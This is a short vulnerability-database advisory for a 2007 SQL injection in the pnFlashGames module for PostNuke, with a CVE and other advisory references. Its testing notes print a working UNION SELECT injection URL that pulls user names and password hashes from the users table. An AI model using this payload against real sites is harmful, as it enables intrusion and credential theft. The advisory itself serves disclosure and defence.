pnFlashGames Module for PostNuke index.php cid Variable SQL Injection

2007-04-28T10:33:58
ID OSVDB:35474
Type osvdb
Reporter OSVDB
Modified 2007-04-28T10:33:58

Description

Manual Testing Notes

/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

References:

Secunia Advisory ID: 25043
ISS X-Force ID: 33960
Generic Exploit URL: http://www.milw0rm.com/exploits/3813
FrSIRT Advisory: ADV-2007-1581
CVE-2007-2427
Bugtraq ID: 23701